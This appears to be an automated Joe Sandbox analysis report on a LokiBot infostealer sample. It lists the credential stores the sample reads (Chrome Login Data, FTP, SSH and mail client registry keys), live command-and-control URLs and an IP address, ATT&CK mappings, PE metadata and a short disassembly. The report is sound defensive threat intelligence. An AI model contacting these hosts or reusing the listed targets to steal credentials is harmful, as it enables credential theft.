                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe TID: 7472Thread sleep time: -900000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeThread delayed: delay time: 60000Jump to behavior
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR
                      Source: Yara matchFile source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: PopPassword0_2_0040D069
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: SmtpPassword0_2_0040D069
                      Source: Yara matchFile source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR
                      Source: Yara matchFile source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      11
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Virtualization/Sandbox Evasion
                      2
                      Credentials in Registry
                      11
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Access Token Manipulation
                      Security Account Manager1
                      Account Discovery
                      SMB/Windows Admin Shares2
                      Data from Local System
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information
                      NTDS1
                      System Owner/User Discovery
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials3
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe97%ReversingLabsWin32.Infostealer.LokiBot
                      1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe100%AviraTR/Crypt.XPACK.Gen
                      1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://94.156.177.220/simple/five/fre.phptrue
                        unknown
                        http://kbfvzoboss.bid/alien/fre.phptrue
                          unknown
                          http://alphastand.win/alien/fre.phptrue
                            unknown
                            http://alphastand.trade/alien/fre.phptrue
                              unknown
                              http://alphastand.top/alien/fre.phptrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.ibsensoftware.com/1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exefalse
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  94.156.177.220
                                  unknownBulgaria
                                  43561NET1-ASBGtrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1541921
                                  Start date and time:2024-10-25 10:19:07 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/2@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 35
                                  • Number of non-executed functions: 5
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimeTypeDescription
                                  04:20:04API Interceptor98x Sleep call for process: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  94.156.177.220SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/simple/five/fre.php
                                  Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/logs/five/fre.php
                                  Logs.xlsGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/logs/five/fre.php
                                  SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/skipo/five/fre.php
                                  17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/logs/five/fre.php
                                  New Order.exeGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220/skipo/five/fre.php
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  NET1-ASBGSecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  sample.binGet hashmaliciousOkiruBrowse
                                  • 93.123.85.166
                                  Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  Logs.xlsGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  hZ6ZMDS1rc.exeGet hashmaliciousAsyncRATBrowse
                                  • 93.123.39.76
                                  New Order.exeGet hashmaliciousLokibotBrowse
                                  • 94.156.177.220
                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                  • 93.123.85.38
                                  boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                  • 93.123.85.38
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:1
                                  Process:C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):46
                                  Entropy (8bit):1.0424600748477153
                                  Encrypted:false
                                  SSDEEP:3:/lbq:4
                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:........................................user.
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.053515766000424
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  File size:106'496 bytes
                                  MD5:3fb350f4356f42b51a523b6fa8cbccf3
                                  SHA1:5f24115b8e734d11deea653df8b32c506c31f4b1
                                  SHA256:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
                                  SHA512:2cfa64f27aa30c8681d7d28ad8a330cb1c830ca6492aa916a4d3177127ee701556c80f234512802dd5c5cc1374c0f47c87ada6587a456c651e3ec3451c0e16af
                                  SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
                                  TLSH:02A32A42B2A5C030F7B74DB2BB73A5B7857E7C332D22C44E9352459A14215E1EB7AB13
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x4139de
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                  Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:0239fd611af3d0e9b0c46c5837c80e09
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  push ecx
                                  and dword ptr [ebp-04h], 00000000h
                                  lea eax, dword ptr [ebp-04h]
                                  push esi
                                  push edi
                                  push eax
                                  call 00007F44208F0209h
                                  push eax
                                  call 00007F44208F01E6h
                                  xor esi, esi
                                  mov edi, eax
                                  pop ecx
                                  pop ecx
                                  cmp dword ptr [ebp-04h], esi
                                  jle 00007F44208F03C6h
                                  push 004188BCh
                                  push dword ptr [edi+esi*4]
                                  call 00007F44208E2895h
                                  pop ecx
                                  pop ecx
                                  test eax, eax
                                  je 00007F44208F03ADh
                                  push 00002710h
                                  call 00007F44208E314Ah
                                  pop ecx
                                  inc esi
                                  cmp esi, dword ptr [ebp-04h]
                                  jl 00007F44208F037Eh
                                  push 00000000h
                                  call 00007F44208F01DEh
                                  push 00000000h
                                  call 00007F44208F04F2h
                                  pop ecx
                                  pop edi
                                  xor eax, eax
                                  pop esi
                                  mov esp, ebp
                                  pop ebp
                                  retn 0010h
                                  push ebp
                                  mov ebp, esp
                                  xor eax, eax
                                  push eax
                                  push eax
                                  push E567384Dh
                                  push eax
                                  call 00007F44208DFB39h
                                  push dword ptr [ebp+08h]
                                  call eax
                                  pop ebp
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, dword ptr [ebp+08h]
                                  test esi, esi
                                  je 00007F44208F0404h
                                  push esi
                                  call 00007F44208E2660h
                                  pop ecx
                                  test eax, eax
                                  je 00007F44208F03F9h
                                  push esi
                                  call 00007F44208E069Ch
                                  pop ecx
                                  test eax, eax
                                  je 00007F44208F03EEh
                                  mov eax, dword ptr [0049FDECh]
                                  cmp dword ptr [ebp+10h], 00000000h
                                  cmovne eax, dword ptr [ebp+10h]
                                  push eax
                                  push dword ptr [0049FDE8h]
                                  call 00007F44208E2094h
                                  push dword ptr [ebp+0Ch]
                                  push dword ptr [0049FDE8h]
                                  call 00007F44208E2086h
                                  push 00000000h
                                  push 00000000h
                                  push esi
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [ASM] VS2003 (.NET) build 3077
                                  • [ASM] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2013 UPD5 build 40629
                                  • [LNK] VS2013 UPD5 build 40629
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x136f50x1380094fa411af1cc6bb168a3ea0e66e80f78False0.5685096153846154data6.49204829439013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x150000x40600x420015686b489e8ad18c33f8b12a6e57b4eeFalse0.3659446022727273data4.255999483050136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x1a0000x85e240x200955b3a57edf41d6c47c7225e8d847f91False0.056640625OpenPGP Public Key0.32171607431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .x0xa00000x20000x20000c3dcd4efb800d2a9617b89e313aa361False0.0181884765625data0.19795807498627813IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  DLLImport
                                  WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
